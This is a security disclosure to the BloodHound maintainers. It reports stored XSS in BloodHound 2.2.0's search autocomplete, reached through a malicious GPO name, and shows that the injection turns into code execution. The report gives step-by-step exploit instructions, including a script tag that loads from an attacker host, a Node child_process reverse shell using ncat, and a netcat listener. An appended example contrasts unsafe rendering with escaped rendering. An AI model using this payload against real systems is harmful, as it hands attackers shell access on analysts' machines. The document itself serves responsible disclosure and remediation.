Description
Dear Bloodhound Team –
I identified a way to achieve code execution in BloodHound 2.2.0 by creating a GPO with a name containing JavaScript code that will trigger in BloodHound's search-autocomplete function. The injected JavaScript is not only a valid XSS but also allows the creation of a child process.
The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat:
- Create a GPO with the following name:
  aaaaaa<SCRIPT SRC="http://<attacker host>:<some port>/poc.js">
- Run SharpHound:
  Invoke-BloodHound -Stealth
- Import collected data
- Host the following JS payload as POC.JS (all uppercase is important here since the SharpHound output JSON always has the value for the name field in upper case), e.g. with python -m SimpleHTTPServer <some port>:
  // require() is reachable from the injected script, so Node's child_process module can be loaded
  const { spawn } = require('child_process');
  // reverse shell: ncat connects back to the attacker host/port and attaches /bin/bash to the socket
  spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);
- Start listener:
  nc -v -l -p <some port>
- Search for "aa" in BloodHound and catch the shell
I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than "aaaaa" and I also would not consider JavaScript as one of my strengths but I hope I could prove my point here :)
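The rendering pattern the report describes, as an added example that is not part of the original issue and not BloodHound's own code: a hypothetical autocomplete renderer that concatenates the collected object name straight into markup, beside the same renderer with HTML escaping applied first. The hostname, port, file path and the `suggestion` class name are placeholders, and the uppercasing helper only mimics what the report says SharpHound does to the name field.

```javascript
// Added example, not BloodHound's code: shows why an unescaped object name
// from the collector output becomes live markup in an autocomplete list,
// and why SharpHound's uppercasing of the name does not defuse the payload.
// Hostname, port and path below are placeholders.

// Constructed sample: the GPO name as it would appear after the collector
// has uppercased the name field in its JSON output.
const COLLECTED_GPO_NAME = 'AAAAAA<SCRIPT SRC="HTTP://ATTACKER.EXAMPLE:8000/POC.JS">';

// Escape the characters that can break out of element content or an
// attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical vulnerable renderer: the raw object name is concatenated
// straight into the suggestion markup, so a name containing a tag is
// interpreted as HTML.
function renderSuggestionUnsafe(name) {
  return `<li class="suggestion">${name}</li>`;
}

// Hardened renderer: identical markup, but the untrusted name is escaped
// first, so it is displayed as text.
function renderSuggestionSafe(name) {
  return `<li class="suggestion">${escapeHtml(name)}</li>`;
}

// Checks whether rendered markup still carries a script tag. HTML tag and
// attribute names are case-insensitive, so <SCRIPT SRC=...> works exactly
// like <script src=...>; only the URL path is case-sensitive, which is why
// the hosted file has to be named POC.JS rather than poc.js.
function containsScriptTag(markup) {
  return /<script\b/i.test(markup);
}

// Mimics the collector uppercasing the name field, to show the payload
// survives that normalisation untouched apart from letter case.
function collectorNormalise(name) {
  return name.toUpperCase();
}

// Demonstration when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  const attackerName = 'aaaaaa<SCRIPT SRC="http://attacker.example:8000/poc.js">';
  const stored = collectorNormalise(attackerName);
  console.log('unsafe :', renderSuggestionUnsafe(stored));
  console.log('safe   :', renderSuggestionSafe(stored));
  console.log('script tag survives unsafe render:', containsScriptTag(renderSuggestionUnsafe(stored)));
  console.log('script tag survives safe render  :', containsScriptTag(renderSuggestionSafe(stored)));
}
```

Escaping at the point of rendering is the fix to apply here; filtering GPO names at collection time would not help, because the name is attacker-controlled in the directory and other object types can carry the same characters.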
